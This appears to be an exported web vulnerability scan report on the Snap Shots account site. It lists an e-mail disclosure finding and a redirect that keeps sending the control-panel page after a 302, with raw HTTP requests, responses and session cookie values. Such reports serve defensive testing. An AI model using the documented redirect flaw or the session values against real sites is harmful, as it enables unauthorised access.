<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script><script type='text/javascript'>function toggle_section(num) { si = document.getElementById('section_'+num+'_img'); sd = document.getElementById('section_'+num+'_div'); sm = document.getElementById('section_'+num+'_more'); if (si.src.indexOf('/images/icon-more.gif') >= 0) { sd.style.display = 'inline'; sm.style.display = 'none'; si.src = '/images/icon-less.gif'; } else { sd.style.display = 'none'; sm.style.display = 'inline'; si.src = '/images/icon-more.gif'; }}</script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script>var currentTab = 'customize';</script><div id="tip1" class="tooltip">With this option enabled, a small icon will be added at <br />the end of your active links, signaling to your users <br />which of your links have Snap Shots and which do not.</div> <div id="tip2" class="tooltip">With this option enabled, the trigger hot-zone for the Snap Shots <br />will be limited to the link icon only, which in turn will decrease <br />the chances of your users accidentally triggering Snap Shots.</div><div id="tip3" class="tooltip">With this option enabled, Snap Shots will be enabled for links <br />pointing to pages on your own site. Not recommended for sites <br />where all pages look the same, unless they have RSS.</div><div id="tip4" class="tooltip">With this option enabled, all Shots on your site will be displayed <br />as the default thumbnail screen-capture. Selecting this option <br />severely limits the level of interactivity of Snap Shots.</div><div id="tip5" class="tooltip">With this option enabled, Snap Shots will be enabled for links <br />pointing to pages on other sites.</div><script type="text/javascript">/* Prototype JavaScript framework, version 1.4.0 * (c) 2005 Sam Stephenson <sam@conio.net> * * Prototype is freely distributable under the terms of an MIT-style license. 
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam e-mail engines and brute-force tools. Furthermore, valid e-mail addresses may lead to social engineering attacks.

Remedy

Use generic e-mail addresses such as contact@ or info@ for general communications, and remove user- or person-specific e-mail addresses from the web site. Should contacting specific people be required, use submission forms for this purpose.

External References

- /signup.php

/signup.php

https://account.snap.com/signup.php

Found E-mails

sam@conio.net

Request

GET /signup.php HTTP/1.1
Referer: https://account.snap.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 21:07:52 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script><script type='text/javascript'>function toggle_section(num) { si = document.getElementById('section_'+num+'_img'); sd = document.getElementById('section_'+num+'_div'); sm = document.getElementById('section_'+num+'_more'); if (si.src.indexOf('/images/icon-more.gif') >= 0) { sd.style.display = 'inline'; sm.style.display = 'none'; si.src = '/images/icon-less.gif'; } else { sd.style.display = 'none'; sm.style.display = 'inline'; si.src = '/images/icon-more.gif'; }}</script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script>var currentTab = 'customize';</script><div id="tip1" class="tooltip">With this option enabled, a small icon will be added at <br />the end of your active links, signaling to your users <br />which of your links have Snap Shots and which do not.</div> <div id="tip2" class="tooltip">With this option enabled, the trigger hot-zone for the Snap Shots <br />will be limited to the link icon only, which in turn will decrease <br />the chances of your users accidentally triggering Snap Shots.</div><div id="tip3" class="tooltip">With this option enabled, Snap Shots will be enabled for links <br />pointing to pages on your own site. Not recommended for sites <br />where all pages look the same, unless they have RSS.</div><div id="tip4" class="tooltip">With this option enabled, all Shots on your site will be displayed <br />as the default thumbnail screen-capture. Selecting this option <br />severely limits the level of interactivity of Snap Shots.</div><div id="tip5" class="tooltip">With this option enabled, Snap Shots will be enabled for links <br />pointing to pages on other sites.</div><script type="text/javascript">/* Prototype JavaScript framework, version 1.4.0 * (c) 2005 Sam Stephenson <sam@conio.net> * * Prototype is freely distributable under the terms of an MIT-style license. 
* For details, see the Prototype web site: http://prototype.conio.net/ */*--------------------------------------------------------------------------*/var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)', emptyFunction: function() {}, K: function(x) {return x}}var Class = { create: function() { return function() { this.initialize.apply(this, arguments); } }}var Abstract = new Object();Object.extend = function (destination, source) { for (property in source) { destination[property] = source[property]; } return destination;}Object.inspect = function(object) { try { if (object == undefined) return 'undefined'; if (object == null) return 'null'; return object.inspect ? object.inspect() : object.toString(); } catch (e) { if (e instanceof RangeError) return '...'; throw e; }}/*** XXX: the default prototype bind leaks memory like a sieve *** XXX: see prototype_extensions.js for the safe version */Function.prototype.bind = function() { var __method = this, args = $A(arguments), object = args.shift(); return function() { return __method.apply(object, args.concat($A(arguments))); }}/***/Function.prototype.bindAsEventListener = function(object) { var __method = this; return function(event) { return __method.call(object, event || window.event); }}Object.extend(Number.prototype, { toColorPart: function() { var digits = this.toString(16); if (this < 16) return '0' + digits; return digits; }, succ: function() { return this + 1; }, times: function(iterator) { $R(0, this, true).each(iterator); return this; }});var Try = { these: function() { var returnValue; for (var i = 0; i < arguments.length; i++) { var lambda = arguments[i]; try { returnValue = lambda(); break; } catch (e) {} } return returnValue; }}/*** SnapShot ***/SnapShot = Class.create();Object.extend(SnapShot.prototype, { initialize: function () { this.time = new Array(); }, store: function () { var index = this.time.length; this.time[index] = new Date();// 
this.time[index].start_time = new Date(); }, reset: function () { this.time = new Array(); }, // the elapsed time of the watch. if the watch hasn't been stopped, get the time that has elapsed so far peek: function () { }, alert: function () { window.alert(this.peek()); }});MultiSnapShot = Class.create();Object.extend(MultiSnapShot.prototype, { initialize: function() { this.watches = {}; }, store: function(w) { if (! this.watches[w]) this.watches[w] = new SnapShot(); this.watches[w].store(); }, reset_all: function() { this.watches = {}; }, output: function() { str = ''; for (var w in this.watches) { if (typeof w != 'function') { for (var i = 0; i < this.watches[w].time.length; i++) { str += '&'+w+'_'+i+'='+this.watches[w].time[i].getTime(); } } } return str; }});/*--------------------------------------------------------------------------*/var PeriodicalExecuter = Class.create();PeriodicalExecuter.prototype = { initialize: function(callback, frequency) { this.callback = callback; this.frequency = frequency; this.currentlyExecuting = false; this.registerCallback(); }, registerCallback: function() { setInterval(this.onTimerEvent.bind(this), this.frequency * 1000); }, onTimerEvent: function() { if (!this.currentlyExecuting) { try { this.currentlyExecuting = true; this.callback(); } finally { this.currentlyExecuting = false; } } }}/*--------------------------------------------------------------------------*/function $() { var elements = new Array(); for (var i = 0; i < arguments.length; i++) { var element = arguments[i]; if (typeof element == 'string') element = document.getElementById(element); if (arguments.length == 1) return element; elements.push(element); } return elements;}Object.extend(String.prototype, { stripTags: function() { return this.replace(/<\/?[^>]+>/gi, ''); }, stripScripts: function() { return this.replace(new RegExp(Prototype.ScriptFragment, 'img'), ''); }, extractScripts: function() { var matchAll = new RegExp(Prototype.ScriptFragment, 'img'); var 
matchOne = new RegExp(Prototype.ScriptFragment, 'im'); return (this.match(matchAll) || []).map(function(scriptTag) { return (scriptTag.match(matchOne) || ['', ''])[1]; }); }, evalScripts: function() { return this.extractScripts().map(eval); },/* escapeHTML: function() { var div = document.createElement('div'); var text = document.createTextNode(this); div.appendChild(text); return div.innerHTML; }, *//* unescapeHTML: function() { var div = document.createElement('div'); div.innerHTML = this.stripTags(); return div.childNodes[0] ? div.childNodes[0].nodeValue : ''; }, */ toQueryParams: function() { var pairs = this.match(/^\??(.*)$/)[1].split('&'); return pairs.inject({}, function(params, pairString) { var pair = pairString.split('='); params[pair[0]] = pair[1]; return params; }); }, toArray: function() { return this.split(''); }, camelize: function() { var oStringList = this.split('-'); if (oStringList.length == 1) return oStringList[0]; var camelizedString = this.indexOf('-') == 0 ? oStringList[0].charAt(0).toUpperCase() + oStringList[0].substring(1) : oStringList[0]; for (var i = 1, len = oStringList.length; i < len; i++) { var s = oStringList[i]; camelizedString += s.charAt(0).toUpperCase() + s.substring(1); } return camelizedString; }, inspect: function() { return "'" + this.replace('\\', '\\\\').replace("'", '\\\'') + "'"; }});String.prototype.parseQuery = String.prototype.toQueryParams;var $break = new Object();var $continue = new Object();var Enumerable = { each: function(iterator) { var index = 0; try { this._each(function(value) { try { iterator(value, index++); } catch (e) { if (e != $continue) throw e; } }); } catch (e) { if (e != $break) throw e; } }, all: function(iterator) { var result = true; this.each(function(value, index) { result = result && !!(iterator || Prototype.K)(value, index); if (!result) throw $break; }); return result; }, any: function(iterator) { var result = true; this.each(function(value, index) { if (result = !!(iterator || 
Prototype.K)(value, index)) throw $break; }); return result; }, collect: function(iterator) { var results = []; this.each(function(value, index) { results.push(iterator(value, index)); }); return results; }, detect: function (iterator) { var result; this.each(function(value, index) { if (iterator(value, index)) { result = value; throw $break; } }); return result; }, findAll: function(iterator) { var results = []; this.each(function(value, index) { if (iterator(value, index)) results.push(value); }); return results; },/* grep: function(pattern, iterator) { var results = []; this.each(function(value, index) { var stringValue = value.toString(); if (stringValue.match(pattern)) results.push((iterator || Prototype.K)(value, index)); }) return results; }, */ include: function(object) { var found = false; this.each(function(value) { if (value == object) { found = true; throw $break; } }); return found; }, inject: function(memo, iterator) { this.each(function(value, index) { memo = iterator(memo, value, index); }); return memo; },/* invoke: function(method) { var args = $A(arguments).slice(1); return this.collect(function(value) { return value[method].apply(value, args); }); }, */ max: function(iterator) { var result; this.each(function(value, index) { value = (iterator || Prototype.K)(value, index); if (value >= (result || value)) result = value; }); return result; }, min: function(iterator) { var result; this.each(function(value, index) { value = (iterator || Prototype.K)(value, index); if (value <= (result || value)) result = value; }); return result; }, partition: function(iterator) { var trues = [], falses = []; this.each(function(value, index) { ((iterator || Prototype.K)(value, index) ? 
trues : falses).push(value); }); return [trues, falses]; }, pluck: function(property) { var results = []; this.each(function(value, index) { results.push(value[property]); }); return results; }, reject: function(iterator) { var results = []; this.each(function(value, index) { if (!iterator(value, index)) results.push(value); }); return results; },/* sortBy: function(iterator) { return this.collect(function(value, index) { return {value: value, criteria: iterator(value, index)}; }).sort(function(left, right) { var a = left.criteria, b = right.criteria; return a < b ? -1 : a > b ? 1 : 0; }).pluck('value'); }, */ toArray: function() { return this.collect(Prototype.K); }, zip: function() { var iterator = Prototype.K, args = $A(arguments); if (typeof args.last() == 'function') iterator = args.pop(); var collections = [this].concat(args).map($A); return this.map(function(value, index) { iterator(value = collections.pluck(index)); return value; }); }, inspect: function() { return '#<Enumerable:' + this.toArray().inspect() + '>'; }}Object.extend(Enumerable, { map: Enumerable.collect, find: Enumerable.detect, select: Enumerable.findAll, member: Enumerable.include, entries: Enumerable.toArray});var $A = Array.from = function(iterable) { if (!iterable) return []; if (iterable.toArray) { return iterable.toArray(); } else { var results = []; for (var i = 0; i < iterable.length; i++) results.push(iterable[i]); return results; }}Object.extend(Array.prototype, Enumerable);Array.prototype._reverse = Array.prototype.reverse;Object.extend(Array.prototype, { _each: function(iterator) { for (var i = 0; i < this.length; i++) iterator(this[i]); }, clear: function() { this.length = 0; return this; }, first: function() { return this[0]; }, last: function() { return this[this.length - 1]; }, compact: function() { return this.select(function(value) { return value != undefined || value != null; }); }, flatten: function() { return this.inject([], function(array, value) { return 
array.concat(value.constructor == Array ? value.flatten() : [value]); }); }, without: function() { var values = $A(arguments); return this.select(function(value) { return !values.include(value); }); }, indexOf: function(object) { for (var i = 0; i < this.length; i++) if (this[i] == object) return i; return -1; }, reverse: function(inline) { return (inline !== false ? this : this.toArray())._reverse(); }, shift: function() { var result = this[0]; for (var i = 0; i < this.length - 1; i++) this[i] = this[i + 1]; this.length--; return result; }, inspect: function() { return '[' + this.map(Object.inspect).join(', ') + ']'; }});var Hash = { _each: function(iterator) { for (key in this) { var value = this[key]; if (typeof value == 'function') continue; var pair = [key, value]; pair.key = key; pair.value = value; iterator(pair); } }, keys: function() { return this.pluck('key'); }, values: function() { return this.pluck('value'); }, merge: function(hash) { return $H(hash).inject($H(this), function(mergedHash, pair) { mergedHash[pair.key] = pair.value; return mergedHash; }); },/* toQueryString: function() { return this.map(function(pair) { return pair.map(encodeURIComponent).join('='); }).join('&'); }, */ inspect: function() { return '#<Hash:{' + this.map(function(pair) { return pair.map(Object.inspect).join(': '); }).join(', ') + '}>'; }}function $H(object) { var hash = Object.extend({}, object || {}); Object.extend(hash, Enumerable); Object.extend(hash, Hash); return hash;}ObjectRange = Class.create();Object.extend(ObjectRange.prototype, Enumerable);Object.extend(ObjectRange.prototype, { initialize: function(start, end, exclusive) { this.start = start; this.end = end; this.exclusive = exclusive; }, _each: function(iterator) { var value = this.start; do { iterator(value); value = value.succ(); } while (this.include(value)); }, include: function(value) { if (value < this.start) return false; if (this.exclusive) return value < this.end; return value <= this.end; }});var $R = 
function(start, end, exclusive) { return new ObjectRange(start, end, exclusive);}var Ajax = { getTransport: function() { return Try.these( function() {return new ActiveXObject('Msxml2.XMLHTTP')}, function() {return new ActiveXObject('Microsoft.XMLHTTP')}, function() {return new XMLHttpRequest()} ) || false; }, activeRequestCount: 0}Ajax.Responders = { responders: [], _each: function(iterator) { this.responders._each(iterator); }, register: function(responderToAdd) { if (!this.include(responderToAdd)) this.responders.push(responderToAdd); }, unregister: function(responderToRemove) { this.responders = this.responders.without(responderToRemove); }, dispatch: function(callback, request, transport, json) { this.each(function(responder) { if (responder[callback] && typeof responder[callback] == 'function') { try { responder[callback].apply(responder, [request, transport, json]); } catch (e) {} } }); }};Object.extend(Ajax.Responders, Enumerable);Ajax.Responders.register({ onCreate: function() { Ajax.activeRequestCount++; }, onComplete: function() { Ajax.activeRequestCount--; }});Ajax.Base = function() {};Ajax.Base.prototype = { setOptions: function(options) { this.options = { method: 'post', asynchronous: true, parameters: '' } Object.extend(this.options, options || {}); }, responseIsSuccess: function() { return this.transport.status == undefined || this.transport.status == 0 || (this.transport.status >= 200 && this.transport.status < 300); }, responseIsFailure: function() { return !this.responseIsSuccess(); }}Ajax.Request = Class.create();Ajax.Request.Events = ['Uninitialized', 'Loading', 'Loaded', 'Interactive', 'Complete'];Ajax.Request.prototype = Object.extend(new Ajax.Base(), { initialize: function(url, options) { this.transport = Ajax.getTransport(); this.setOptions(options); this.request(url); }, request: function(url) { var parameters = this.options.parameters || ''; // XXX: commented out by Barry because he has no concept of how this could be relevant 
(03/02/2006) // if (parameters.length > 0) parameters += '&_='; try { this.url = url; if (this.options.method == 'get' && parameters.length > 0) this.url += (this.url.match(/\?/) ? '&' : '?') + parameters; Ajax.Responders.dispatch('onCreate', this, this.transport); this.transport.open(this.options.method, this.url, this.options.asynchronous); if (this.options.asynchronous) { this.transport.onreadystatechange = this.onStateChange.bind(this); setTimeout((function() {this.respondToReadyState(1)}).bind(this), 10); } this.setRequestHeaders(); var body = this.options.postBody ? this.options.postBody : parameters; this.transport.send(this.options.method == 'post' ? body : null); } catch (e) { this.dispatchException(e); } }, setRequestHeaders: function() { var requestHeaders = ['X-Requested-With', 'XMLHttpRequest', 'X-Prototype-Version', Prototype.Version]; if (this.options.method == 'post') { requestHeaders.push('Content-type', 'application/x-www-form-urlencoded'); /* Force "Connection: close" for Mozi..
Redirect Response BODY Is Too Large

Redirect Response BODY Is Too Large

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the page returned an HTTP redirect status but output more content than usual. This generally indicates that, after issuing the redirect, the page did not terminate the response as it should have.

Impact

This can lead to serious issues such as authentication bypass on pages that require authentication; on other pages it generally indicates a programming error.

Remedy

Finish the HTTP response after you redirect the user.

In ASP.NET, use Response.Redirect("redirected-page.aspx", true); instead of Response.Redirect("redirected-page.aspx", false);. In PHP applications, call exit(); after you redirect the user.

- /

/ CONFIRMED

https://account.snap.com/

Request

GET / HTTP/1.1
Referer: https://account.snap.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 302 Found
Date: Sat, 23 Jul 2011 21:07:51 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=0ecdf68911c776c6a84eb351224d5573; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /login.php
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Your Snap Shots Control Panel</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script><script type='text/javascript'>function toggle_section(num) { si = document.getElementById('section_'+num+'_img'); sd = document.getElementById('section_'+num+'_div'); sm = document.getElementById('section_'+num+'_more'); if (si.src.indexOf('/images/icon-more.gif') >= 0) { sd.style.display = 'inline'; sm.style.display = 'none'; si.src = '/images/icon-less.gif'; } else { sd.style.display = 'none'; sm.style.display = 'inline'; si.src = '/images/icon-more.gif'; }}function show_tab(tab) { var code = (tab == 'code') ? true : false; document.getElementById('editorial_text').style.display = code ? 'none' : ''; document.getElementById('code_text').style.display = code ? '' : 'none'; document.getElementById('editorial_tab').src = "/images/tab-editorial" + (code ? '' : '-on') + ".gif"; document.getElementById('code_tab').src = "/images/tab-code" + (code ? '-on' : '') + ".gif";}function resend_verification_email(email) { url = "/resend_verification_email.php?email="+escape(email); if (window.XMLHttpRequest) { xmlhttp=new XMLHttpRequest(); xmlhttp.open("GET",url,false); xmlhttp.send(null); } else if (window.ActiveXObject) { xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); if (xmlhttp){ xmlhttp.open("GET",url,false); xmlhttp.send(); } } else { var t_img = new Image(); t_img.src = url; } e = document.getElementById("resend_email"); e.innerHTML="A new verification email has been sent to . Please verify receipt by clicking the confirmation link in that email."; e.className="alert"; return false;}</script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<div id="top-cap"></div><div id="wrapper"><!-- begin left side --> <div id="leftSide"> <h1>Your Snap Control Panel</h1> <div id="statusInfo"> <h3>Welcome, </h3> </div> <div class="message"> <h4>Get the Most Out of Snap Shots</h4> <p> Before you can access Snap Shares&trade;, you need to verify receipt of an email that has been sent to <b></b> by clicking the confirmation link in that email. </p> <p id="resend_email" class="info"> If you have not received that email you can request the email to be re-sent by clicking the following link: <a href="" onclick="return resend_verification_email('');">Re-send Verification Email</a> </p> <small>IMPORTANT: Please make sure to check your junk mail filter and update your settings to allow emails from the domain snap.com</small> </div> <div id="colCombine"> <h2>Manage Your Snap Shots Sites</h2> <div class="add-sites"> <img src="images/icon-add.gif" alt="+" border="0" width="9" height="9" /> <a href="/add_site.php">Add Snap Shots to another site</a> </div> <p><br /></p> <h2>Best Practices</h2> <p>The following are some simple steps that, in the experience of tens of thousands of site owners, have proved to work best when implementing Snap Shots on a web site or a blog.</p> <div> <img id="section_1_img" class="js-expand" src="/images/icon-more.gif" width="12" height="12" onclick="toggle_section(1);"> <b class="js-expand" onclick="toggle_section(1);">Explain the New Functionality</b><br /> <p class="inset"> When you install Snap Shots on your site, you should tell your readers about the new functionality. The announcement should include instruction for how your visitors can disable the functionality if they don't want it. 
<span id="section_1_more" style="display: inline"><a href="#" onclick="toggle_section(1);return false;">See Example</a></span> </p> <div id="section_1_div" style="display: none;"> <div class="example_text"> <div class="tabs"><img id="editorial_tab" src="/images/tab-editorial-on.gif" alt="Blog Text" onclick="show_tab('editorial');" /><img id="code_tab" src="/images/tab-code.gif" alt="Sample Code" onclick="show_tab('code');" /></div> <div class="example_body"> <div id="editorial_text" style="display:inherit;"> <h4>Introducing Snap Shots from Snap.com</h4> <p>I just installed a nice little tool on this site called Snap Shots that enhances links with visual previews of the <a href="http://www.snap.com" class="snap_noshots">destination site</a>, interactive excerpts of <a href="http://en.wikipedia.org/wiki/Picasso" class="snap_noshots">Wikipedia articles</a>, <a href="http://www.myspace.com/askaninja" class="snap_noshots">MySpace profiles</a>, <a href="http://imdb.com/name/nm0424060" class="snap_noshots">IMDb profiles</a> and <a href="http://www.amazon.com/Nokia-N95-Silver-Phone-Unlocked/dp/B000PEOLAG/" class="snap_noshots">Amazon products</a>, display inline <a href="http://youtube.com/watch?v=7rEM_dN24S0" class="snap_noshots">videos</a>, <a href="http://www.slashdot.org/" class="snap_noshots">RSS</a>, <a href="http://wiredset.com/media/colin_macintyre/How-Bout-I-Love-You-More.mp3" class="snap_noshots">MP3s</a>, <a href="http://i116.photobucket.com/albums/o34/perspexspaceship/" class="snap_noshots">photos</a>, <a href="http://finance.yahoo.com/q?s=aapl" class="snap_noshots">stock charts</a> and <a href="http://shots.snap.com" class="snap_noshots">more</a>.</p> <p>Sometimes Snap Shots bring you the information you need, without your having to leave the site, while other times it lets you "look ahead," before deciding if you want to follow a link or not.</p> <p>Should you decide this is not for you, just click the Options icon in the upper right corner of the Snap Shot 
and opt-out.</p> </div> <div id="code_text" style="display:none;"> <textarea style="width: 380px !important; height: 200px !important; font-size: 10px;"> <h4>Introducing Snap Shots from Snap.com</h4> I just installed a nice little tool on this site called Snap Shots that enhances links with visual previews of the <a href="http://www.snap.com" class="snap_shots">destination site</a>, interactive excerpts of <a href="http://en.wikipedia.org/wiki/Picasso" class="snap_shots">Wikipedia articles</a>, <a href="http://www.myspace.com/askaninja" class="Snap_Shot_Profile">MySpace profiles</a>, <a href="http://imdb.com/name/nm0424060" class="snap_shots">IMDb profiles</a> and <a href="http://www.amazon.com/Nokia-N95-Silver-Phone-Unlocked/dp/B000PEOLAG/" class="snap_shots">Amazon products</a>, display inline <a href="http://youtube.com/watch?v=7rEM_dN24S0" class="snap_shots">videos</a>, <a href="http://www.slashdot.org/" class="Snap_Shot_RSS">RSS</a>, <a href="http://wiredset.com/media/colin_macintyre/How-Bout-I-Love-You-More.mp3" class="snap_shots">MP3s</a>, <a href="http://i116.photobucket.com/albums/o34/perspexspaceship/" class="snap_shots">photos</a>, <a href="http://finance.yahoo.com/q?s=aapl" class="snap_shots">stock charts</a> and <a href="http://shots.snap.com" class="snap_shots">more</a>.<p>Sometimes Snap Shots bring you the information you need, without your having to leave the site, while other times it lets you "look ahead," before deciding if you want to follow a link or not.</p> <p>Should you decide this is not for you, just click the Options icon in the upper right corner of the Snap Shot and opt-out.</p> </textarea> </div> <hr /> <small>Please feel free to copy the text above, or write something along the same lines yourself.</small> </div> </div> </div> </div> <p></p> <div> <img id="section_2_img" class="js-expand" src="/images/icon-more.gif" width="12" height="12" onclick="toggle_section(2);"> <b class="js-expand" onclick="toggle_section(2);">Add a Snap Shots 
Badge</b><br /> <p class="inset"> By adding a Snap Shots Badge to your site, you let anyone visiting know that there is nothing ordinary about your site. <br /><a href="#" id="section_2_more" onclick="toggle_section(2);return false;">Show Snap Shots Badges</a> </p> <div id="section_2_div" style="display: none;"> <table id="badges"> <tr> <td class="col1"><img src="/images/shotsbadge1-120x30.gif" width="120" height="30" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /><br />(GIF 120x30)</td> <td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge1-120x30.gif"><img src="http://i.snap.com/images/shotsbadge1-120x30.gif" width="120" height="30" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> <tr> <td class="col1"><img src="/images/shotsbadge2-120x30.gif" width="120" height="30" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /><br />(GIF 120x30)</td> <td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge2-120x30.gif"><img src="http://i.snap.com/images/shotsbadge2-120x30.gif" width="120" height="30" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> <tr> <td class="col1"><img src="/images/shotsbadge3-120x30.gif" alt="Enhanced with Snapshots" width="120" height="30"><br />(GIF 120x30)</td> <td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge3-120x30.gif"><img src="http://i.snap.com/images/shotsbadge3-120x30.gif" width="120" height="30" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> <tr> <td class="col1"><img src="/images/shotsbadge4-120x30.gif" alt="Enhanced with Snapshots" width="120" height="30"><br />(GIF 120x30)</td> 
<td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge4-120x30.gif"><img src="http://i.snap.com/images/shotsbadge4-120x30.gif" width="120" height="30" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> <tr> <td class="col1"><img src="/images/shotsbadge1-160x40.gif" alt="Enhanced with Snapshots" width="160" height="40"><br />(GIF 160x40)</td> <td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge1-160x40.gif"><img src="http://i.snap.com/images/shotsbadge1-160x40.gif" width="160" height="40" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> <tr> <td class="col1"><img src="/images/shotsbadge2-160x40.gif" alt="Enhanced with Snapshots" width="160" height="40"><br />(GIF 160x40)</td> <td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge2-160x40.gif"><img src="http://i.snap.com/images/shotsbadge2-160x40.gif" width="160" height="40" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> <tr> <td class="col1"><img src="/images/shotsbadge3-160x40.gif" alt="Enhanced with Snapshots" width="160" height="40"><br />(GIF 160x40)</td> <td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge3-160x40.gif"><img src="http://i.snap.com/images/shotsbadge3-160x40.gif" width="160" height="40" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> <tr> <td class="col1"><img src="/images/shotsbadge4-160x40.gif" alt="Enhanced with Snapshots [button]" width="160" height="40"><br />(GIF 160x40)</td> <td><textarea rows="4" name="badge-code"><a 
class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge4-160x40.gif"><img src="http://i.snap.com/images/shotsbadge4-160x40.gif" width="160" height="40" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> </table> </div> </div> </div><!-- end leftSide --> </div><div id="rightSide"><div class="sidebar"><h4>Recent Blog Posts</h4></div></div><div style="clear: both;"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
